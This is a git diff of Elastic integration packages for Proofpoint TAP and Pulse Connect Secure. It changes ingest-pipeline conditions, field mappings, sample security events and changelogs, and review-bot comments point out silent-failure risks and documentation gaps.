ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: @@ -461,7 +470,7 @@ processors: field: _ingest._value.threatTime ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: 
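Review bot: The new `foreach` renames `_ingest._value.threatId` into `_ingest._value.threat.id`, which is the same target the `foreach` directly above already writes (its source field is outside the hunk, presumably the other casing of the same key). If an item ever carries both spellings, the second `rename` throws on the existing target and `ignore_failure: true` swallows it, leaving `threatId` behind as an unmapped key with no error surfaced — the same silent state the removed sample-event lines showed. Consider guarding the inner processor, e.g. `if: ctx._ingest._value.threat?.id == null` if the foreach metadata is reachable from the condition, or confirm against the TAP API which spelling is actually emitted and keep only that rename. A one-line comment on the new block explaining why two spellings are handled would also help the next maintainer.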
@@ -470,7 +479,7 @@ processors: target_field: _ingest._value.threat.type ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: @@ -479,10 +488,10 @@ processors: target_field: _ingest._value.threat.url ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - remove: field: event.original - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - remove: diff --git a/packages/proofpoint_tap/data_stream/message_blocked/fields/ecs.yml b/packages/proofpoint_tap/data_stream/message_blocked/fields/ecs.yml index 06421df3981..0bdb1f5ebba 100644 --- a/packages/proofpoint_tap/data_stream/message_blocked/fields/ecs.yml +++ b/packages/proofpoint_tap/data_stream/message_blocked/fields/ecs.yml @@ -6,6 +6,8 @@ name: email.attachments.file.hash.md5 - external: ecs name: email.attachments.file.hash.sha256 +- external: ecs + name: email.attachments.file.mime_type - external: ecs name: email.attachments.file.name - external: ecs diff --git a/packages/proofpoint_tap/data_stream/message_blocked/sample_event.json b/packages/proofpoint_tap/data_stream/message_blocked/sample_event.json index 180d6171d8e..e3ab5d769ee 100644 --- a/packages/proofpoint_tap/data_stream/message_blocked/sample_event.json +++ b/packages/proofpoint_tap/data_stream/message_blocked/sample_event.json 
@@ -1,11 +1,11 @@
 {
 "@timestamp": "2021-11-25T09:10:00.050Z",
 "agent": {
- "ephemeral_id": "c84bcbe5-ed0f-4c89-a9c4-8b21738f93d2",
- "id": "f25d13cd-18cc-4e73-822c-c4f849322623",
+ "ephemeral_id": "2738078c-875f-4284-984f-5858cbba75c9",
+ "id": "633dac72-aecd-41d9-88df-dd066a3b83ea",
 "name": "docker-fleet-agent",
 "type": "filebeat",
- "version": "8.10.1"
+ "version": "8.13.0"
 },
 "data_stream": {
 "dataset": "proofpoint_tap.message_blocked",
@@ -16,9 +16,9 @@
 "version": "8.11.0"
 },
 "elastic_agent": {
- "id": "f25d13cd-18cc-4e73-822c-c4f849322623",
+ "id": "633dac72-aecd-41d9-88df-dd066a3b83ea",
 "snapshot": false,
- "version": "8.10.1"
+ "version": "8.13.0"
 },
 "email": {
 "attachments": [
@@ -75,9 +75,9 @@ "category": [ "email" ], - "created": "2023-09-22T17:33:59.847Z", + "created": "2024-04-03T23:27:42.516Z", "dataset": "proofpoint_tap.message_blocked", - "ingested": "2023-09-22T17:34:02Z", + "ingested": "2024-04-03T23:27:46Z", "kind": "event", "original": "{\"GUID\":\"x11xxxx1-12f9-111x-x12x-1x1x123456xx\",\"QID\":\"x2XXxXXX111111\",\"ccAddresses\":[\"abc@example.com\"],\"clusterId\":\"pharmtech_hosted\",\"completelyRewritten\":\"true\",\"fromAddress\":\"abc@example.com\",\"headerCC\":\"\\\"Example Abc\\\" \\u003cabc@example.com\\u003e\",\"headerFrom\":\"\\\"A. Bc\\\" \\u003cabc@example.com\\u003e\",\"headerReplyTo\":null,\"headerTo\":\"\\\"Aa Bb\\\" \\u003caa.bb@example.com\\u003e; \\\"Hey Hello\\\" \\u003chey.hello@example.com\\u003e\",\"impostorScore\":0,\"malwareScore\":100,\"messageID\":\"12345678912345.12345.mail@example.com\",\"messageParts\":[{\"contentType\":\"text/plain\",\"disposition\":\"inline\",\"filename\":\"text.txt\",\"md5\":\"b10a8db164e0754105b7a99be72e3fe5\",\"oContentType\":\"text/plain\",\"sandboxStatus\":\"unsupported\",\"sha256\":\"a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e\"},{\"contentType\":\"application/pdf\",\"disposition\":\"attached\",\"filename\":\"text.pdf\",\"md5\":\"b10a8db164e0754105b7a99be72e3fe5\",\"oContentType\":\"application/pdf\",\"sandboxStatus\":\"threat\",\"sha256\":\"a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e\"}],\"messageTime\":\"2021-11-25T09:10:00.050Z\",\"modulesRun\":[\"pdr\",\"sandbox\",\"spam\",\"urldefense\"],\"phishScore\":46,\"policyRoutes\":[\"default_inbound\",\"executives\"],\"quarantineFolder\":\"Attachment Defense\",\"quarantineRule\":\"module.sandbox.threat\",\"recipient\":[\"example.abc@example.com\",\"hey.hello@example.com\"],\"replyToAddress\":null,\"sender\":\"x99x7x5580193x6x51x597xx2x0210@example.com\",\"senderIP\":\"175.16.199.1\",\"spamScore\":4,\"subject\":\"Please find a totally safe invoice 
attached.\",\"threatsInfoMap\":[{\"campaignId\":\"46x01x8x-x899-404x-xxx9-111xx393d1x7\",\"classification\":\"MALWARE\",\"threat\":\"a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e\",\"threatId\":\"2xxx740f143fc1aa4c1cd0146d334x5593b1428x6x062b2c406e5efe8xxx95xx\",\"threatStatus\":\"active\",\"threatTime\":\"2021-11-25T09:10:00.050Z\",\"threatType\":\"ATTACHMENT\",\"threatUrl\":\"https://www.example.com/?name=john\"},{\"campaignId\":\"46x01x8x-x899-404x-xxx9-111xx393d1x7\",\"classification\":\"MALWARE\",\"threat\":\"example.com\",\"threatId\":\"3xx97xx852c66a7xx761450xxxxxx9f4ffab74715b591294f78b5e37a76481xx\",\"threatTime\":\"2021-07-20T05:00:00.050Z\",\"threatType\":\"URL\",\"threatUrl\":\"https://www.example.com/?name=john\"}],\"toAddresses\":[\"example.abc@example.com\",\"hey.hello@example.com\"],\"xmailer\":\"Spambot v2.5\"}", "type": [ @@ -137,23 +137,23 @@ "classification": "MALWARE", "threat": { "artifact": "a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e", + "id": "2xxx740f143fc1aa4c1cd0146d334x5593b1428x6x062b2c406e5efe8xxx95xx", "status": "active", "time": "2021-11-25T09:10:00.050Z", "type": "ATTACHMENT", "url": "https://www.example.com/?name=john" - }, - "threatId": "2xxx740f143fc1aa4c1cd0146d334x5593b1428x6x062b2c406e5efe8xxx95xx" + } }, { "campaign_id": "46x01x8x-x899-404x-xxx9-111xx393d1x7", "classification": "MALWARE", "threat": { "artifact": "example.com", + "id": "3xx97xx852c66a7xx761450xxxxxx9f4ffab74715b591294f78b5e37a76481xx", "time": "2021-07-20T05:00:00.050Z", "type": "URL", "url": "https://www.example.com/?name=john" - }, - "threatId": "3xx97xx852c66a7xx761450xxxxxx9f4ffab74715b591294f78b5e37a76481xx" + } } ], "to_addresses": [ @@ -191,4 +191,4 @@ "forwarded", "proofpoint_tap-message_blocked" ] -} +} \ No newline at end of file 
diff --git a/packages/proofpoint_tap/data_stream/message_delivered/elasticsearch/ingest_pipeline/default.yml b/packages/proofpoint_tap/data_stream/message_delivered/elasticsearch/ingest_pipeline/default.yml index 685248d5a9d..c48afc6ce29 100644 --- a/packages/proofpoint_tap/data_stream/message_delivered/elasticsearch/ingest_pipeline/default.yml +++ b/packages/proofpoint_tap/data_stream/message_delivered/elasticsearch/ingest_pipeline/default.yml @@ -95,7 +95,7 @@ processors: allow_duplicates: false ignore_failure: true ignore_failure: true - if: ctx.json?.messageParts != null && ctx.json.messageParts instanceof List + if: ctx.json?.messageParts instanceof List - foreach: field: json.messageParts processor: @@ -105,7 +105,7 @@ processors: allow_duplicates: false ignore_failure: true ignore_failure: true - if: ctx.json?.messageParts != null && ctx.json.messageParts instanceof List + if: ctx.json?.messageParts instanceof List - rename: field: json.ccAddresses target_field: email.cc.address @@ -164,7 +164,7 @@ processors: allow_duplicates: false ignore_failure: true ignore_failure: true - if: ctx.json?.recipient != null && ctx.json.recipient instanceof List + if: ctx.json?.recipient instanceof List - rename: field: json.xmailer target_field: email.x_mailer @@ -187,7 +187,7 @@ processors: - _ingest._value.sandboxStatus ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -196,7 +196,7 @@ processors: target_field: _ingest._value.file.mime_type ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: 
@@ -205,7 +205,7 @@ processors: target_field: _ingest._value.file.hash.md5 ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -214,7 +214,7 @@ processors: target_field: _ingest._value.file.hash.sha256 ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -223,14 +223,14 @@ processors: target_field: _ingest._value.file.name ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - script: description: Adding hash in related.hash from artifact field. lang: painless ignore_failure: true source: | if (ctx.json?.threatsInfoMap instanceof List) { - for (artifact in ctx.json?.threatsInfoMap) { + for (artifact in ctx.json.threatsInfoMap) { def flag = true; def str = artifact.threat.toLowerCase(); if (str?.length() == 64) { @@ -319,7 +319,7 @@ processors: - _ingest._value.sha256 ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.message_parts != null && ctx.proofpoint_tap.message_delivered.message_parts instanceof List + if: ctx.proofpoint_tap?.message_delivered?.message_parts instanceof List - foreach: field: proofpoint_tap.message_delivered.message_parts processor: @@ -328,7 +328,7 @@ processors: target_field: _ingest._value.o_content_type ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.message_parts != null && ctx.proofpoint_tap.message_delivered.message_parts instanceof List + if: ctx.proofpoint_tap?.message_delivered?.message_parts instanceof List - foreach: field: proofpoint_tap.message_delivered.message_parts processor: 
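Review bot: The `related.hash` script in this data stream has the same weak spot as its message_blocked twin: directly under the changed `for` header, `artifact.threat.toLowerCase()` is not null-safe, so one item without a `threat` key raises an NPE that `ignore_failure: true` on the script processor turns into a silent abort of the entire loop, dropping all related hashes for the event. The `str?.length()` check that follows cannot help because `str` is never null at that point. Change the line to `def str = artifact.threat?.toLowerCase();` so the existing guard becomes effective and a missing value is skipped rather than fatal. The script continues beyond the hunk, so only this prefix was reviewed.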
@@ -337,7 +337,7 @@ processors: target_field: _ingest._value.sandbox_status ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.message_parts != null && ctx.proofpoint_tap.message_delivered.message_parts instanceof List + if: ctx.proofpoint_tap?.message_delivered?.message_parts instanceof List - convert: field: json.messageSize target_field: proofpoint_tap.message_delivered.message_size @@ -403,7 +403,7 @@ processors: target_field: _ingest._value.campaign_id ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: @@ -412,7 +412,7 @@ processors: target_field: _ingest._value.threat.artifact ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: @@ -421,7 +421,7 @@ processors: target_field: _ingest._value.threat.id ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: 
@@ -430,7 +430,7 @@ processors: target_field: _ingest._value.threat.status ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: @@ -441,7 +441,7 @@ processors: formats: - ISO8601 ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: @@ -449,7 +449,7 @@ processors: field: _ingest._value.threatTime ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: @@ -458,7 +458,7 @@ processors: target_field: _ingest._value.threat.type ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: 
@@ -467,10 +467,10 @@ processors: target_field: _ingest._value.threat.url ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - remove: field: event.original - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - remove: diff --git a/packages/proofpoint_tap/data_stream/message_delivered/fields/ecs.yml b/packages/proofpoint_tap/data_stream/message_delivered/fields/ecs.yml index 06421df3981..0bdb1f5ebba 100644 --- a/packages/proofpoint_tap/data_stream/message_delivered/fields/ecs.yml +++ b/packages/proofpoint_tap/data_stream/message_delivered/fields/ecs.yml @@ -6,6 +6,8 @@ name: email.attachments.file.hash.md5 - external: ecs name: email.attachments.file.hash.sha256 +- external: ecs + name: email.attachments.file.mime_type - external: ecs name: email.attachments.file.name - external: ecs diff --git a/packages/proofpoint_tap/docs/README.md b/packages/proofpoint_tap/docs/README.md index e83ca7d69c3..ff7779d1785 100644 --- a/packages/proofpoint_tap/docs/README.md +++ b/packages/proofpoint_tap/docs/README.md @@ -503,11 +503,11 @@ An example event for `message_blocked` looks as following: { "@timestamp": "2021-11-25T09:10:00.050Z", "agent": { - "ephemeral_id": "c84bcbe5-ed0f-4c89-a9c4-8b21738f93d2", - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "ephemeral_id": "2738078c-875f-4284-984f-5858cbba75c9", + "id": "633dac72-aecd-41d9-88df-dd066a3b83ea", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.13.0" }, "data_stream": { "dataset": "proofpoint_tap.message_blocked", 
@@ -518,9 +518,9 @@ An example event for `message_blocked` looks as following:
 "version": "8.11.0"
 },
 "elastic_agent": {
- "id": "f25d13cd-18cc-4e73-822c-c4f849322623",
+ "id": "633dac72-aecd-41d9-88df-dd066a3b83ea",
 "snapshot": false,
- "version": "8.10.1"
+ "version": "8.13.0"
 },
 "email": {
 "attachments": [
@@ -577,9 +577,9 @@ An example event for `message_blocked` looks as following: "category": [ "email" ], - "created": "2023-09-22T17:33:59.847Z", + "created": "2024-04-03T23:27:42.516Z", "dataset": "proofpoint_tap.message_blocked", - "ingested": "2023-09-22T17:34:02Z", + "ingested": "2024-04-03T23:27:46Z", "kind": "event", "original": "{\"GUID\":\"x11xxxx1-12f9-111x-x12x-1x1x123456xx\",\"QID\":\"x2XXxXXX111111\",\"ccAddresses\":[\"abc@example.com\"],\"clusterId\":\"pharmtech_hosted\",\"completelyRewritten\":\"true\",\"fromAddress\":\"abc@example.com\",\"headerCC\":\"\\\"Example Abc\\\" \\u003cabc@example.com\\u003e\",\"headerFrom\":\"\\\"A. Bc\\\" \\u003cabc@example.com\\u003e\",\"headerReplyTo\":null,\"headerTo\":\"\\\"Aa Bb\\\" \\u003caa.bb@example.com\\u003e; \\\"Hey Hello\\\" \\u003chey.hello@example.com\\u003e\",\"impostorScore\":0,\"malwareScore\":100,\"messageID\":\"12345678912345.12345.mail@example.com\",\"messageParts\":[{\"contentType\":\"text/plain\",\"disposition\":\"inline\",\"filename\":\"text.txt\",\"md5\":\"b10a8db164e0754105b7a99be72e3fe5\",\"oContentType\":\"text/plain\",\"sandboxStatus\":\"unsupported\",\"sha256\":\"a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e\"},{\"contentType\":\"application/pdf\",\"disposition\":\"attached\",\"filename\":\"text.pdf\",\"md5\":\"b10a8db164e0754105b7a99be72e3fe5\",\"oContentType\":\"application/pdf\",\"sandboxStatus\":\"threat\",\"sha256\":\"a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e\"}],\"messageTime\":\"2021-11-25T09:10:00.050Z\",\"modulesRun\":[\"pdr\",\"sandbox\",\"spam\",\"urldefense\"],\"phishScore\":46,\"policyRoutes\":[\"default_inbound\",\"executives\"],\"quarantineFolder\":\"Attachment Defense\",\"quarantineRule\":\"module.sandbox.threat\",\"recipient\":[\"example.abc@example.com\",\"hey.hello@example.com\"],\"replyToAddress\":null,\"sender\":\"x99x7x5580193x6x51x597xx2x0210@example.com\",\"senderIP\":\"175.16.199.1\",\"spamScore\":4,\"subject\":\"Please find a 
totally safe invoice attached.\",\"threatsInfoMap\":[{\"campaignId\":\"46x01x8x-x899-404x-xxx9-111xx393d1x7\",\"classification\":\"MALWARE\",\"threat\":\"a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e\",\"threatId\":\"2xxx740f143fc1aa4c1cd0146d334x5593b1428x6x062b2c406e5efe8xxx95xx\",\"threatStatus\":\"active\",\"threatTime\":\"2021-11-25T09:10:00.050Z\",\"threatType\":\"ATTACHMENT\",\"threatUrl\":\"https://www.example.com/?name=john\"},{\"campaignId\":\"46x01x8x-x899-404x-xxx9-111xx393d1x7\",\"classification\":\"MALWARE\",\"threat\":\"example.com\",\"threatId\":\"3xx97xx852c66a7xx761450xxxxxx9f4ffab74715b591294f78b5e37a76481xx\",\"threatTime\":\"2021-07-20T05:00:00.050Z\",\"threatType\":\"URL\",\"threatUrl\":\"https://www.example.com/?name=john\"}],\"toAddresses\":[\"example.abc@example.com\",\"hey.hello@example.com\"],\"xmailer\":\"Spambot v2.5\"}", "type": [ @@ -639,23 +639,23 @@ An example event for `message_blocked` looks as following: "classification": "MALWARE", "threat": { "artifact": "a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e", + "id": "2xxx740f143fc1aa4c1cd0146d334x5593b1428x6x062b2c406e5efe8xxx95xx", "status": "active", "time": "2021-11-25T09:10:00.050Z", "type": "ATTACHMENT", "url": "https://www.example.com/?name=john" - }, - "threatId": "2xxx740f143fc1aa4c1cd0146d334x5593b1428x6x062b2c406e5efe8xxx95xx" + } }, { "campaign_id": "46x01x8x-x899-404x-xxx9-111xx393d1x7", "classification": "MALWARE", "threat": { "artifact": "example.com", + "id": "3xx97xx852c66a7xx761450xxxxxx9f4ffab74715b591294f78b5e37a76481xx", "time": "2021-07-20T05:00:00.050Z", "type": "URL", "url": "https://www.example.com/?name=john" - }, - "threatId": "3xx97xx852c66a7xx761450xxxxxx9f4ffab74715b591294f78b5e37a76481xx" + } } ], "to_addresses": [ @@ -694,7 +694,6 @@ An example event for `message_blocked` looks as following: "proofpoint_tap-message_blocked" ] } - ``` **Exported fields** 
@@ -722,6 +721,7 @@ An example event for `message_blocked` looks as following: | email.attachments | A list of objects describing the attachment files sent along with an email message. | nested | | email.attachments.file.hash.md5 | MD5 hash. | keyword | | email.attachments.file.hash.sha256 | SHA256 hash. | keyword | +| email.attachments.file.mime_type | The MIME media type of the attachment. This value will typically be extracted from the `Content-Type` MIME header field. | keyword | | email.attachments.file.name | Name of the attachment file including the file extension. | keyword | | email.cc.address | The email address of CC recipient | keyword | | email.content_type | Information about how the message is to be displayed. Typically a MIME type. | keyword | @@ -962,6 +962,7 @@ An example event for `message_delivered` looks as following: | email.attachments | A list of objects describing the attachment files sent along with an email message. | nested | | email.attachments.file.hash.md5 | MD5 hash. | keyword | | email.attachments.file.hash.sha256 | SHA256 hash. | keyword | +| email.attachments.file.mime_type | The MIME media type of the attachment. This value will typically be extracted from the `Content-Type` MIME header field. | keyword | | email.attachments.file.name | Name of the attachment file including the file extension. | keyword | | email.cc.address | The email address of CC recipient | keyword | | email.content_type | Information about how the message is to be displayed. Typically a MIME type. | keyword | diff --git a/packages/proofpoint_tap/manifest.yml b/packages/proofpoint_tap/manifest.yml index 0a3c853f630..13834a77d87 100644 --- a/packages/proofpoint_tap/manifest.yml +++ b/packages/proofpoint_tap/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: proofpoint_tap title: Proofpoint TAP -version: "1.16.2" +version: "1.18.0" description: Collect logs from Proofpoint TAP with Elastic Agent. type: integration categories: 
@@ -9,7 +9,7 @@ categories: - email_security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/proofpoint_tap-screenshot.png title: Proofpoint TAP blocked clicks dashboard screenshot @@ -51,6 +51,7 @@ policy_templates: title: Secret Key description: Secret Key for the Basic Authentication. required: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/pulse_connect_secure/changelog.yml b/packages/pulse_connect_secure/changelog.yml index 850bbb4487c..579b9998ec3 100644 --- a/packages/pulse_connect_secure/changelog.yml +++ b/packages/pulse_connect_secure/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.19.1" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9587 +- version: "1.19.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9403 +- version: "1.18.3" + changes: + - description: Fix duplicate session field + type: bugfix + link: https://github.com/elastic/integrations/pull/9107 - version: "1.18.2" changes: - description: Changed owners @@ -8,7 +23,7 @@ changes: - description: Handle session token in vpn log type: bugfix - link: https://github.com/elastic/integrations/pull/8434 + link: https://github.com/elastic/integrations/pull/8873 - version: 1.18.0 changes: - description: ECS version updated to 8.11.0. diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json index bbd6b0e503a..b0e78a041b5 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json 
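Review bot: `secret: true` on the Secret Key only takes effect on Fleet versions that support policy secrets, which is what the `kibana.version` bump to `^8.12.0` in the same hunk appears to be buying, yet neither the 1.17.0 nor the 1.18.0 changelog entry mentions the raised minimum, so operators on 8.7–8.11 will see the package vanish from their upgrade list without explanation; add a line such as `Requires Kibana 8.12.0 or later so that the Secret Key can be stored as a policy secret.` to the changelog or README. Also note that `proxy_url` in the context below remains a plain `text` variable; a proxy URL carrying embedded `user:pass@` credentials would be stored and displayed in clear, so if such URLs are supported it deserves either `secret: true` or a caution in its description (pre-existing, not introduced here). Separately, the pulse_connect_secure changelog entry on this same line links to `https://github.com/elastic/integrations/pulls/9587`; `pulls` should be `pull` to match the other entries.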
@@ -1171,7 +1171,10 @@ "pulse_secure": { "realm": "Admin SSO", "role": ".Administrators", - "session": "64e62c265e" + "session": { + "id": "sidbe3ce20a68202d1b91a4be7060b78c4a2825ce9100000000", + "id_short": "64e62c265e" + } }, "source": { "address": "89.160.20.156", diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tcp-config.yml index 69185dd8402..68c1f03dd66 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tcp-config.yml +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -6,3 +6,5 @@ data_stream: syslog_host: 0.0.0.0 syslog_port: 9515 preserve_original_event: true +assert: + hit_count: 9 diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tls-config.yml b/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tls-config.yml index 8e9ede384ce..012cae649ae 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tls-config.yml +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tls-config.yml @@ -57,3 +57,5 @@ data_stream: BdcwL671AnnDY3GUxcmX7n8/E4lFwQEf5G4IbKa+/fIm4y4wzkINHYnCeTvVPHUZ rcZR4kw7O4cWsLR4NHJBosUVoaeoCizBB6xLREqISxIZuHKuEcYsRA== -----END RSA PRIVATE KEY----- +assert: + hit_count: 9 diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-udp-config.yml index 0753740e71f..0a598538ec2 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-udp-config.yml +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-udp-config.yml @@ -6,3 +6,5 @@ data_stream: syslog_host: 0.0.0.0 syslog_port: 9514 preserve_original_event: true +assert: + hit_count: 9 
diff --git a/packages/pulse_connect_secure/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/pulse_connect_secure/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 7d18624e44e..ace8572d9fd 100644 --- a/packages/pulse_connect_secure/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/pulse_connect_secure/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -21,7 +21,7 @@ processors: - grok: field: event.original patterns: - - '^(<%{NONNEGINT:log.syslog.priority:long}>%{NUMBER}?|%{SYSLOGTIMESTAMP} %{SYSLOGHOST:host.hostname} %{INT}) %{TIMESTAMP_ISO8601:_tmp.timestamp} (%{IP:observer.ip}|%{HOSTNAME:observer.hostname}) PulseSecure: - - - %{DATE2} - %{SYSLOGHOST:observer.name} - \[%{IPORHOST:client.address}\] (%{DATA}::)?(%{HOSTNAME:user.domain}\\)?%{USERNAME:user.name}?(@%{USERNAME:user.domain})?\(%{DATA:pulse_secure.realm}?\)\[%{DATA:pulse_secure.role}\](?::?\[%{DATA:pulse_secure.session}\])? - %{GREEDYDATA:message}' + - '^(<%{NONNEGINT:log.syslog.priority:long}>%{NUMBER}?|%{SYSLOGTIMESTAMP} %{SYSLOGHOST:host.hostname} %{INT}) %{TIMESTAMP_ISO8601:_tmp.timestamp} (%{IP:observer.ip}|%{HOSTNAME:observer.hostname}) PulseSecure: - - - %{DATE2} - %{SYSLOGHOST:observer.name} - \[%{IPORHOST:client.address}\] (%{DATA}::)?(%{HOSTNAME:user.domain}\\)?%{USERNAME:user.name}?(@%{USERNAME:user.domain})?\(%{DATA:pulse_secure.realm}?\)\[%{DATA:pulse_secure.role}\](?::?\[%{DATA:pulse_secure.session.id_short}\])? - %{GREEDYDATA:message}' pattern_definitions: TIMESTAMP_ISO8601: '%{YEAR}-%{MONTHNUM}-%{MONTHDAY}[T ]%{HOUR}:?%{MINUTE}(?::?%{SECOND})?%{ISO8601_TIMEZONE:event.timezone}?' DATE2: '%{YEAR}-%{MONTHNUM}-%{MONTHDAY} %{HOUR}:?%{MINUTE}(?::?%{SECOND})?' 
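Review bot: Renaming the grok capture from `pulse_secure.session` to `pulse_secure.session.id_short` resolves the keyword-versus-object clash with `pulse_secure.session.id`, but it is a field rename: any saved search, visualization or detection rule keyed on `pulse_secure.session` silently stops matching after the upgrade, while the changelog files this as a `bugfix` patch. Consider a short migration note in the changelog or README, e.g. `Field pulse_secure.session has been replaced by pulse_secure.session.id_short; update saved queries accordingly.` The value captured here is the bracketed identifier from the log header, whereas the full `sid…` token is captured by a separate pattern (inferred from the `id`/`id_short` shape in the updated test expectation, not from this hunk). The grok processor's remaining `pattern_definitions` continue past the end of the hunk.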
